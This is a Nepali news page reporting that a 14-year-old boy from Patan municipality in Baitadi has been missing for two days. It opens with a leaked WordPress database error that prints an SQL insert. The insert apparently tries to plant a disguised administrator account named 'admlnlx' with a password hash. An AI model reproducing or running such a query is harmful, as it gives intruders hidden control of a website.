WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkQj/in87WmBdPWT651P.01tDvrIGd.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 01:09:59', '', 'admlnlx', 'admlnlx')
बैतडी, मंसिर २४ –
जिल्लाको पाटन नगरपालिकाका एक बालक दुई दिनदेखि बेपत्ता भएका छन् ।
बेपत्ता हुनेमा पाटन नगरपालिका– ९ वसन्तपुरका भानसिंह बोहराका १४ वर्षिय छोरा प्रकाशसिंह बोहरा रहेका छन् ।
स्थानीय बजार मुस्याचौर जान्छु भनि गत बिहीबार हिँडेको छोरा घर फर्केको छैन, बेपत्ता बालकका बुबा भानबहादुर बोहराले रासससँग भन्नुभयो “छिमेकी, नातागोता सबैतिर सोधपुछ गर्दा पनि भेटिएन ”
बेपत्ता छोराको खोजी गरिदिन प्रहरीसमक्ष अनुरोध गरेको पनि उहाँले बताउनुभयो । – रासस